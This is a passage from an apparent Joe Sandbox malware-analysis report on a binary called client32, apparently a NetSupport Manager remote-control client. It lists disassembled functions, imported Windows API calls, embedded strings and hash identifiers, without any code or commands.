                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                • String ID:
                                                                                                • API String ID: 3803058747-0
                                                                                                • Opcode ID: cb1dd7c1b185a862817eaa18515fac4e568c92006d35533992b022284e107ff6
                                                                                                • Instruction ID: d1212ce253e3835444f1406f1691ddd9f402073cda887c54771f97ba44c69039
                                                                                                • Opcode Fuzzy Hash: cb1dd7c1b185a862817eaa18515fac4e568c92006d35533992b022284e107ff6
                                                                                                • Instruction Fuzzy Hash: EE01B139940300FEE710EFB8C92174C77A0AF04728F20D239E958ABAC0CB7599808B75
                                                                                                Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B3585
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B3598
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B35A5
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                                • CloseHandle.KERNEL32(?), ref: 110B35D0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$EventObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 2857295742-0
                                                                                                • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                                • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                                • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                                • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                                Function 69CE68D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,69CF3061,?), ref: 69CE69EB
                                                                                                • _free.LIBCMT ref: 69CE6A07
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE6A1B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_free
                                                                                                • String ID: FAILED_REASON$LICENSE
                                                                                                • API String ID: 2208350527-1913596546
                                                                                                • Opcode ID: fd5152da6264f66e42133cec01d81e38486933e6a19f5afce538ad3b8b25853b
                                                                                                • Instruction ID: e77bfaf0fd5b2b64a34a34c4a2027ad0fe3ed3138f98452591becaa69393de4f
                                                                                                • Opcode Fuzzy Hash: fd5152da6264f66e42133cec01d81e38486933e6a19f5afce538ad3b8b25853b
                                                                                                • Instruction Fuzzy Hash: 4E413A729049465BDB018F78AB546ABBBF1AF52389F149174DE879B700FB31DA09C3D0
                                                                                                Function 69CE2E50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID: %s: $HTCTL32
                                                                                                • API String ID: 4139908857-3797952780
                                                                                                • Opcode ID: cf10e64d446cc0edc87022e24511229aaa5fbd919843895f0011347aa3c9cb58
                                                                                                • Instruction ID: 361d2432d6e9697a2c900f0d8b33e51268c68d39b8e740128116746f16b89e06
                                                                                                • Opcode Fuzzy Hash: cf10e64d446cc0edc87022e24511229aaa5fbd919843895f0011347aa3c9cb58
                                                                                                • Instruction Fuzzy Hash: 7C41D93450019A9BDB15CF28DC28BEE7774FF46359F10C6A5E91A97180EB31964ACF90
                                                                                                Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MapWindowPoints.USER32 ref: 110773FB
                                                                                                  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                                • EqualRect.USER32 ref: 1107740C
                                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014), ref: 11077466
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11077447
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 2754115966-2830328467
                                                                                                • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                                • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                                Function 69CFFAD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,986B9CC5), ref: 69CFFB04
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CFFB3E
                                                                                                • SetEvent.KERNEL32(?), ref: 69CFFB69
                                                                                                • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 69CFFBA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                                                • String ID: list<T> too long
                                                                                                • API String ID: 930337060-4027344264
                                                                                                • Opcode ID: a1711cfa4dd443604df47c486690fce53be242f8d19380ff8796f3d6275aac28
                                                                                                • Instruction ID: 213820748d1fb3561a3df536efc123f93a8104107908c60dfae578257fbc0c1a
                                                                                                • Opcode Fuzzy Hash: a1711cfa4dd443604df47c486690fce53be242f8d19380ff8796f3d6275aac28
                                                                                                • Instruction Fuzzy Hash: 0331AF756046049FDB14CF68D950B5ABBF8FF4D310F10866DE95A87B84E730E801CB60
                                                                                                Function 69CEBB90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEBC16
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
                                                                                                • API String ID: 3180605519-89615960
                                                                                                • Opcode ID: c96c8b5cbf44c4eb9edfe8bf44c1ea795bc467f80a22ab2d82336cc06c3b4db7
                                                                                                • Instruction ID: b7b10493f0d0fffbea8186899e8a92554e0d1b5ba459b8544145a332efac120d
                                                                                                • Opcode Fuzzy Hash: c96c8b5cbf44c4eb9edfe8bf44c1ea795bc467f80a22ab2d82336cc06c3b4db7
                                                                                                • Instruction Fuzzy Hash: 012159BA900209BADB11DBA4ED40FEF73BCAF45208F509519EA06B7544FB31EA45C7B1
                                                                                                Function 69CEBAC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEBB46
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
                                                                                                • API String ID: 3180605519-2489130399
                                                                                                • Opcode ID: 75e1741caf388a945a7000eb72d8c329d9b649078aa1be5ba6cfaa5b02e861c4
                                                                                                • Instruction ID: 966962e7852b8d134c3461cdad9bebafcc046b541d2eec84b014864ec5a306b8
                                                                                                • Opcode Fuzzy Hash: 75e1741caf388a945a7000eb72d8c329d9b649078aa1be5ba6cfaa5b02e861c4
                                                                                                • Instruction Fuzzy Hash: 02215CBA900208BADB11DBA4ED40EEF737CAF45208F509515EA06A7544FB31EA05C7B1
                                                                                                Function 69CE2A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 69CE2ACB
                                                                                                • _strrchr.LIBCMT ref: 69CE2ADA
                                                                                                • _strrchr.LIBCMT ref: 69CE2AEA
                                                                                                • wsprintfA.USER32 ref: 69CE2B05
                                                                                                  • Part of subcall function 69CE2CE0: GetModuleHandleA.KERNEL32(NSMTRACE,69CE2AB1), ref: 69CE2CFA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                • String ID: HTCTL32
                                                                                                • API String ID: 2529650285-1670862073
                                                                                                • Opcode ID: 33d0d31da895cfbc89b5a1681fefa825af921936374496089260d0be299d6b33
                                                                                                • Instruction ID: 9b8534f21ef448cec759153f71c034e321e8f911cb6f39635251a628d5572e79
                                                                                                • Opcode Fuzzy Hash: 33d0d31da895cfbc89b5a1681fefa825af921936374496089260d0be299d6b33
                                                                                                • Instruction Fuzzy Hash: 3A2105799002895BEB22DF34DD65BDA7BA4EB17308F4040A8DA4B5B2C1E6B05946C7A1
                                                                                                Function 69CE7DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE7E0E
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7EB7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7ED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_memset
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 3751686142-4141403093
                                                                                                • Opcode ID: e08b1dfd7a42c48e481484b5d81b98e7c484166958a5075c104ccf3b039cdb54
                                                                                                • Instruction ID: 2a7d85ad16726462042591aec7ce3d9317c972de5afde435366d9a9ad447add9
                                                                                                • Opcode Fuzzy Hash: e08b1dfd7a42c48e481484b5d81b98e7c484166958a5075c104ccf3b039cdb54
                                                                                                • Instruction Fuzzy Hash: B1217CB1C00208AEEF50CFA4D8057AEBBF4FF09304F0080B9E619E7280EB755A549BA1
                                                                                                Function 69CEBE00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset_strncpy
                                                                                                • String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
                                                                                                • API String ID: 3140232205-2748231828
                                                                                                • Opcode ID: e3038d6298146a9ab0c2b6de90e234fc257a975efd75c18a8424611759d61146
                                                                                                • Instruction ID: ed84bd1d133d8dc2ecc0038964b6be4dd616123b3e23fd509028210a3202644c
                                                                                                • Opcode Fuzzy Hash: e3038d6298146a9ab0c2b6de90e234fc257a975efd75c18a8424611759d61146
                                                                                                • Instruction Fuzzy Hash: B0110A7664071167EB158A16BC46BFF33549B12799F014035FF09A77C1F372A89483E5
                                                                                                Function 69CFFDE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32(986B9CC5), ref: 69CFFE0A
                                                                                                • EnterCriticalSection.KERNEL32 ref: 69CFFE19
                                                                                                • LeaveCriticalSection.KERNEL32 ref: 69CFFE8C
                                                                                                  • Part of subcall function 69CFF540: InitializeCriticalSection.KERNEL32(69D2CF98,986B9CC5,?,?,?,?,?,69D1EFC8,000000FF), ref: 69CFF574
                                                                                                  • Part of subcall function 69CFF540: EnterCriticalSection.KERNEL32(69D2CF98,986B9CC5,?,?,?,?,?,69D1EFC8,000000FF), ref: 69CFF590
                                                                                                  • Part of subcall function 69CFF540: LeaveCriticalSection.KERNEL32(69D2CF98,?,?,?,?,?,69D1EFC8,000000FF), ref: 69CFF5D8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                • String ID: Refcount.cpp$p.second
                                                                                                • API String ID: 2150084884-1554893322
                                                                                                • Opcode ID: a54e2f2ebe5902b7588c8f1f695911c93549cbfe4e996b3c41c548768eaf5176
                                                                                                • Instruction ID: 4a5d992ff7986def5e619b0714be8fc22ee8ad0c5c499c0fdbd3db3bb6970436
                                                                                                • Opcode Fuzzy Hash: a54e2f2ebe5902b7588c8f1f695911c93549cbfe4e996b3c41c548768eaf5176
                                                                                                • Instruction Fuzzy Hash: B22196B6904608AFDB11DF94D841FEFF7B8FF19314F10812AEA5693640E7306609CB91
                                                                                                Function 69CFB960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __strdup
                                                                                                • String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 838363481-1357550281
                                                                                                • Opcode ID: 016a92cb1483b9b3bf1303177cd3d28a672a54a63873ca4648f8e4d9f7c07a1b
                                                                                                • Instruction ID: cf60de212e2774dd4c116dc4bedaf54679d1268372371d863a919dfb9cbb242c
                                                                                                • Opcode Fuzzy Hash: 016a92cb1483b9b3bf1303177cd3d28a672a54a63873ca4648f8e4d9f7c07a1b
                                                                                                • Instruction Fuzzy Hash: AF110EF5A006066BC704DB18F815E2AB7A8AF8535CB00C035FB999BB00F771AD0B5791
                                                                                                Function 69CFFFC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57threadwindowsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69CFFFD8
                                                                                                  • Part of subcall function 69CFDAC0: SetEvent.KERNEL32(00000000), ref: 69CFDAE4
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 69D0000C
                                                                                                  • Part of subcall function 69CFFBC0: EnterCriticalSection.KERNEL32(?,?,750A4D1D,69D0001D), ref: 69CFFBC8
                                                                                                  • Part of subcall function 69CFFBC0: LeaveCriticalSection.KERNEL32(?), ref: 69CFFBD5
                                                                                                • PostMessageA.USER32 ref: 69D00034
                                                                                                • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 69D0003B
                                                                                                Strings
                                                                                                Memory Dump Source
